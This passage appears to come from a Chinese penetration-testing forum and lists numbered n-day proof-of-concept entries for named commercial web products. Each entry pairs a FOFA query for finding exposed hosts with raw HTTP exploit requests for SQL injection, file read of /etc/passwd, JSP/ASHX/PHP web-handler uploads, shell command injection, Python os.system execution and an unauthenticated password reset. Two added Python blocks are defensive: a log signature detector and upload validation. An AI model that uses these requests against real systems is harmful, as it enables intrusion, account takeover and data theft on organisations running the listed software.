Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Stacked-query, time-based (WAITFOR DELAY is a SQL Server primitive): a vulnerable host answers about 5 seconds late.

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

The poi parameter is fetched as a URL, so the file:// scheme turns the endpoint into a local file reader.

191. 亿赛通 (ESAFENET) electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

The /js/../ prefix in the path is what reaches the servlet; a vulnerable host answers about 5 seconds late.

192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

The name query parameter decides the stored file's extension, and the raw body becomes its content, so a minimal ASP.NET web handler (.ashx) is written straight to the server. A successful upload serves "test" from the resulting handler.

193. 山石网科 (Hillstone) 云鉴 security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Three steps: fetch a CSRF token from getTokenAction.php using an arbitrary PHPSESSID, submit the command through setSystemTimeAction.php with that token (the same PHPSESSID must be reused), then fetch /master/img/config to confirm the write.

GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

The param value is evaluated as Python on the server side; the POC writes a marker into a file under the web root and reads it back rather than running a blind command.

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If /servlet/uploadAttachmentServlet answers a request (rather than returning 404), the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

The traversal sequence in filename walks out of the attachment directory into the deployed fe.war, so the JSP lands where the container executes it.

195. 飞鱼星 (Volans) internet behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

The name field is interpolated into a shell command; the leading ; terminates the intended command and the kernel banner from uname -a comes back in the response.

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

The endpoint sets the password of the account named in xgh without any authentication; run it only against a throwaway account when verifying.

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

The ;.js suffix on the path bypasses the authentication filter; a vulnerable host echoes 12321 (111*111) in the response.

198. aliyundrive-webdav (阿里云盘 WebDAV) LuCI command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

Authenticated (a valid sysauth cookie is required). The sid value URL-decodes to `ls />/www/aaa.txt`, so the command output is written into the LuCI web root and can be fetched as /aaa.txt.

199. Cockpit CMS assetsmanager/upload file upload
FOFA:title="Authenticate Please!"

1. Fetch the login page to obtain the csfr token:
GET /auth/login?to=/ HTTP/1.1

Response: 200; the page contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Log in with that JWT to obtain a session cookie (the POC logs in as admin/admin):
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with that session cookie, then fetch the stored file:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

The uploaded PHP deletes itself on first execution (unlink(__FILE__)), so a verification run leaves no file behind.

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

Time-based blind via the id parameter of the danmaku endpoint: a vulnerable host answers about 5 seconds late.

201. 方正 (Founder) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

TableName, FieldName and KeyName are concatenated into the query, so the table name itself carries a stacked WAITFOR DELAY; a vulnerable host answers about 5 seconds late.

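Most of entries 186 to 201 rely on a handful of request-level primitives: SLEEP()/WAITFOR DELAY/RANDOMBLOB time-based probes, UNION SELECT, a shell metacharacter in front of a reconnaissance command, and /etc/passwd, file:// or ../ traversal. The following Python sweep is an added example (not part of the original write-up and not code from any of the products listed): it URL-decodes each request twice and matches those exact primitives, which a defender can point at proxy or access-log exports to find attempts against the endpoints above. The sample requests are constructed here from the POCs on this page, plus two benign controls; the `SIGNATURES` list, the request tuple layout and the function names are assumptions of this example.

```python
"""Signature sweep for the Nday primitives used in entries 186-201.

Added example, not part of the original write-up. Sample requests are
constructed from the POCs above; the tuple layout is an assumption.
"""
import re
from urllib.parse import unquote_plus

# Each signature is matched against the URL-decoded, lower-cased request
# target plus body. The patterns encode the exact primitives the POCs rely
# on rather than generic "SQL keyword" matching, to keep false positives low.
SIGNATURES = [
    # time-based / resource-exhausting blind SQLi: SLEEP(), WAITFOR DELAY,
    # pg_sleep(), BENCHMARK(), and the SQLite RANDOMBLOB() probe from entry 186
    ("time_based_sqli",
     re.compile(r"\b(?:sleep\s*\(\s*\d|waitfor\s+delay\s+'|pg_sleep\s*\(|benchmark\s*\(|randomblob\s*\()")),
    # UNION-based probes (entries 197 and 201)
    ("union_sqli", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    # shell metacharacter followed by a common reconnaissance command
    # (entries 195 and 198), or Python os.system() reaching an eval sink (entry 193)
    ("os_command_injection",
     re.compile(r"(?:;|\|\|?|&&|`|\$\()\s*(?:uname|id|whoami|cat|ls|echo|wget|curl|nc|bash|sh)\b"
                r"|os\.system\s*\(")),
    # local file read via an absolute path, a file:// URL, or multi-step traversal
    ("file_read_or_traversal", re.compile(r"/etc/passwd|file:///|(?:\.\./){2,}")),
]


def normalise(text: str) -> str:
    """URL-decode twice (unwraps double encoding) and lower-case for matching."""
    return unquote_plus(unquote_plus(text)).lower()


def classify(method: str, target: str, body: str = "") -> list:
    """Return the names of every signature that fires on one request."""
    haystack = normalise(target) + "\n" + normalise(body)
    return [name for name, rx in SIGNATURES if rx.search(haystack)]


# Constructed sample traffic: (label, method, target, body). Targets and bodies
# are copied from the POCs on this page; the labels are this example's own.
SAMPLE_REQUESTS = [
    ("lanwon_deleteStudy", "GET",
     "/xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27--", ""),
    ("seacms_dmku", "GET",
     "/js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list", ""),
    ("founder_binary", "POST", "/newsedit/newsplan/task/binary.do",
     "TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B"
     "select+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1"),
    ("entsoft_quotegask", "GET",
     "/entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist", ""),
    ("volans_send_order", "POST", "/send_order.cgi?parameter=operation",
     '{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}'),
    ("aliyundrive_webdav", "GET",
     "/cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20", ""),
    ("hillstone_setSystemTime", "POST", "/master/ajaxActions/setSystemTimeAction.php?token_csrf=x",
     "param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')"),
    ("poihuoqu", "POST", "/index.php/admin/Userinfo/poihuoqu", "poi=file:///etc/passwd"),
    ("fe_uploadAttachment", "POST", "/servlet/uploadAttachmentServlet",
     'Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"'),
    ("benign_news", "GET", "/index.php?page=news&id=42", ""),
    ("benign_login", "POST", "/login", "username=alice&password=s3cret!"),
]


def scan(requests=SAMPLE_REQUESTS) -> dict:
    """Map each request label to the list of signatures it triggers."""
    return {label: classify(method, target, body)
            for label, method, target, body in requests}


if __name__ == "__main__":
    for label, hits in scan().items():
        print(f"{label:26s} {'ALERT ' + ','.join(hits) if hits else 'ok'}")
```

The decode-twice step matters: several of the POCs arrive percent-encoded (entry 189, 198, 201), and a WAF or log pipeline that matches on the raw line misses them. The benign controls show why the command-injection pattern deliberately excludes a lone & (an `&id=` query parameter would otherwise fire).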
202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute the __VIEWSTATE and __EVENTVALIDATION values into the upload:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

The file is stored under /_data/Uploads/ with the client-supplied name and no extension check; the POC uploads a harmless .txt as proof.

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

The part declares image/jpeg while carrying a .jsp; the server trusts the declared type and the extension from filename, which is why the JSP is stored and executed.
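Entries 192, 194, 199, 202 and 203 are all the same upload mistake seen from different angles: the stored name comes from the client (a query parameter in 192, a traversal-laden filename in 194, the original name in 199, 202 and 203) and the type check trusts the declared Content-Type. The following Python checks are an added example (not code from any of those products) showing the server-side validation that would have stopped each of them: extension from the basename only, an allow-list with no executable types, magic-byte verification of the content, a server-generated stored name, and a final path check against the upload root. The upload root, the allow-list and every function name are assumptions of this example.

```python
"""Server-side upload validation that would have stopped entries 192, 194,
199, 202 and 203. Added example, not code from any of those products."""
import os
import secrets

# Allow-listed extensions, each with the magic bytes a genuine file must start
# with. Executable server-side types (.jsp, .ashx, .php, .aspx ...) are absent.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}


class UploadRejected(ValueError):
    """Raised with a reason string when an upload fails validation."""


def client_extension(filename: str) -> str:
    """Extract the extension from the client-supplied filename, defensively.

    Only the last path component counts, so a filename such as
    '../../../../../jboss/web/fe.war/hello.jsp' (entry 194) cannot steer the
    write location; NUL bytes and dot-only names are rejected outright.
    """
    if "\x00" in filename:
        raise UploadRejected("NUL byte in filename")
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].strip()
    if base in ("", ".", "..") or "." not in base:
        raise UploadRejected("filename has no usable extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{ext} is not allowed")
    return ext


def validate_upload(filename: str, data: bytes, declared_type: str = "") -> str:
    """Validate one upload and return the server-chosen name to store it under.

    The client's Content-Type (declared_type) never influences the decision:
    entry 203 ships a .jsp as image/jpeg and entry 192 picks the extension via
    a query parameter. Only the bytes and the allow-list count.
    """
    ext = client_extension(filename)
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected(f"content does not look like a .{ext} file "
                             f"(declared {declared_type or 'nothing'})")
    # Server-generated name: the original is kept only as metadata, so neither
    # double extensions (shell.php.jpg) nor traversal survive into the path.
    return f"{secrets.token_hex(16)}.{ext}"


def storage_path(upload_root: str, stored_name: str) -> str:
    """Resolve the final path and refuse anything that escapes the upload root.

    The root is assumed to sit outside the web document root and, if served at
    all, to go through a handler that never executes what it serves.
    """
    root = os.path.realpath(upload_root)
    path = os.path.realpath(os.path.join(root, stored_name))
    if os.path.commonpath([root, path]) != root:
        raise UploadRejected("resolved path escapes the upload root")
    return path


def is_accepted(filename: str, data: bytes, declared_type: str = "") -> bool:
    """Convenience wrapper: True when the upload passes every check."""
    try:
        validate_upload(filename, data, declared_type)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    # The POC payloads from this page, replayed against the checks.
    for name, payload, ctype in [
        ("../../../../../jboss/web/fe.war/hello.jsp", b'<% out.println("hello");%>', "text/plain"),
        ("11.jsp", b'<% out.print("hello,eHR");%>', "image/jpeg"),
        ("tttt.php", b'<?php echo "tttt";unlink(__FILE__);?>', "text/php"),
        ("1123.txt", b"Hello World!", "text/plain"),
        ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16, "image/jpeg"),
    ]:
        print(f"{name:45s} accepted={is_accepted(name, payload, ctype)}")
```

Generating the stored name on the server is the single change with the widest effect: it removes the attacker's control over the extension (192), the directory (194) and the Apache-style double-extension trick at once, and it makes the final `storage_path` check a pure defence in depth rather than the only barrier.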
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2